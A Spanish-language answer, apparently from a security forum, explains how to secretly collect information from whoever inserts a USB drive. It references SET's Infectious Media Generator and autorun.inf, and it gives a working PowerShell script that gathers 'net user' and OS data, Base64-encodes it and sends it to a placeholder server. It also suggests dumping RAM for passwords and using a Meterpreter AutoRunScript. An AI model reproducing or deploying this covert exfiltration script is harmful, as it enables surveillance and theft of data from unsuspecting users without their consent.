Obtener información de la computadora (nombre de usuario registrado) en secreto usando una unidad USB

Como usted probablemente sepa,

  

SET Infectious Media Generator crea un archivo autorun.inf y una carga útil Metasploit Source .

Ya que no desea utilizar la carga útil de Metasploit, simplemente puede crear un archivo de ejecución automática y un script de Powershell para recopilar información. Es posible que desee recopilar diferentes tipos de información, desde el usuario que inició sesión hasta la dirección MAC, etc.

Un ataque más sofisticado (que probablemente requeriría permisos adicionales) implicaría descargar la RAM del usuario objetivo y buscar cadenas específicas, como la contraseña. No soy un experto en este tema, pero esto se puede hacer mediante el uso de herramientas que normalmente se usan en el análisis forense en vivo.

  

el problema aquí es que solo tengo que obtener solo la información (no dañina) de la computadora / usuario que inserta el USB y no acceder directamente a su sistema

Por esto, entiendo que solo quieres algunos sysinfo, no credenciales reales.

Script de Powershell para publicar la información en una página:

$userinfo = net user
$sysinfo = Get-CimInstance Win32_OperatingSystem
$Text = $sysinfo + $userinfo
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$USERDATA =[Convert]::ToBase64String($Bytes)

Invoke-WebRequest http://www.yourserver.com/submit?userdata=$USERDATA

Tenga en cuenta que existen algunas limitaciones en cuanto a la política de ejecución. Creo que una solución mucho más robusta sería un Meterpreter con un AutoRunScript que recopila la información de los usuarios y sale inmediatamente.

Las computadoras modernas tampoco ejecutan automáticamente el autorun.inf, es probable que necesites la interacción del usuario.